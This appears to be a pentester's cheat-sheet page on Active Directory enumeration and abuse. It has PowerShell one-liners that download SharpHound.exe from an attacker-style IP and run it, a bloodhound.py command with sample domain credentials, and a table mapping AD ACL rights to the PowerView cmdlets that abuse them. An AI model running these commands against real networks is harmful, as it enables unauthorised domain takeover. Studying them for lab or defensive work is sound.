Bloodhound

SharpHound

IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.10/SharpHound.exe', 'SharpHound.exe')

.\SharpHound.exe --CollectionMethods All
IWR -Uri http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe
.\SharpHound.exe -c All --zipfilename QU35T

Bloodhound.py

bloodhound.py --zip -c All -d qu35t.pw -u 'qu35t' -p 'Password1!' -ns 172.17.0.3

ACL Abuse

Object
Abused with

ForceChangePassword

Set-DomainUserPassword

Add Members

Add-DomainGroupMember

GenericAll

Set-DomainUserPassword / Add-DomainGroupMember

GenericWrite

Set-DomainObject

WriteOwner

Set-DomainObjectOwner

WriteDACL

Add-DomainObjectACL

AllExtendedRights

Set-DomainUserPassword / Add-DomainGroupMember

Addself

Add-DomainGroupMember

Via Windows :

PreviousImpacketNextPowershell

Last updated